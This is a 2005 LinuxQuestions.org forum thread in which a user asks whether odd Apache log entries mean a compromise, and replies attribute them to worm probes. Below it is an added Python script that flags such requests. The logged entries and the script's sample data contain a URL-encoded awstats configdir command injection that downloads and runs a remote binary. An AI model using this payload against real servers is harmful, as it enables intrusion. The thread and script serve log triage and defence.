LinuxQuestions.org

lawadm1 11-27-2005 08:06 PM

Apache entries - Hacked??
 
I found the following entries in my access_log that I have never received before. It looks like they were all 404, but I would feel much better if someone verified it. TIA Jeff

211.214.161.159 - - [27/Nov/2005:14:13:22 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:23 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:25 -0600] "POST /xmlrpc.php HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:27 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:28 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:32 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

211.214.161.159 - - [27/Nov/2005:14:13:33 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

lord-fu 11-27-2005 08:22 PM

Hi,

Not a security expert but I have seen those in my logs as well and they are looking for those files on windoze machines. I believe IMHO that you can safely ignore those...however I am no expert and I am sure someone else will give their input as well.

btmiller 11-27-2005 08:49 PM

I think they are looking for *nix boxen, since these look a lot like hits from the Lupper worm, which attacks several vulnerable Web applications. I've seen this on a number of servers, and so long as you don't have the vulnerable applications installed, you are OK.
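
Added example, not part of any post in this thread: a small Python triage script for the question in the first post. It flags the two request patterns shown there (shell metacharacters in the `awstats.pl` `configdir` parameter, and POSTs to `xmlrpc.php`) and separates 404 responses from requests that reached an existing path. The rule names, the verdict labels and the sample log lines are assumptions constructed for illustration; the addresses come from documentation ranges.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format, modelled on the
# entries in the first post (documentation addresses, shortened query string).
SAMPLE_LOG = """\
192.0.2.10 - - [27/Nov/2005:14:13:22 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2flisten;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0"
192.0.2.10 - - [27/Nov/2005:14:13:25 -0600] "POST /xmlrpc.php HTTP/1.1" 404 290 "-" "Mozilla/4.0"
192.0.2.10 - - [27/Nov/2005:14:13:33 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [27/Nov/2005:14:20:01 -0600] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
"""

# client, timestamp, method, request target (may contain spaces), protocol, status, size
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?) (HTTP/[\d.]+)" (\d{3}) (\S+)'
)

def classify(line):
    """Return (ip, rule, status, verdict) for a probe line, or None otherwise."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _ts, method, target, _proto, status, _size = m.groups()
    path, _, query = target.partition("?")
    decoded = unquote(query)  # %3b -> ';', %20 -> ' ', so the rule sees real characters
    rule = None
    if path.endswith("/awstats.pl") and re.search(r"configdir=[^&]*[|;]", decoded):
        rule = "awstats-configdir-shell-metachar"  # hypothetical rule name
    elif method == "POST" and path.endswith("/xmlrpc.php"):
        rule = "xmlrpc-php-probe"                  # hypothetical rule name
    if rule is None:
        return None
    # 404: the script was not there, so the request never reached an application.
    # Anything else: the path exists and answered, so the installed app needs checking.
    verdict = "not-found" if status == "404" else "review"
    return ip, rule, int(status), verdict

def scan(text):
    """Classify every line of a log and keep only the probe hits."""
    return [hit for hit in map(classify, text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, rule, status, verdict in scan(SAMPLE_LOG):
        print(f"{ip}  {rule:34} {status}  {verdict}")
```

A `review` verdict only means the requested path exists on the server; whether the application behind it is a vulnerable version still has to be checked separately.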


All times are GMT -5.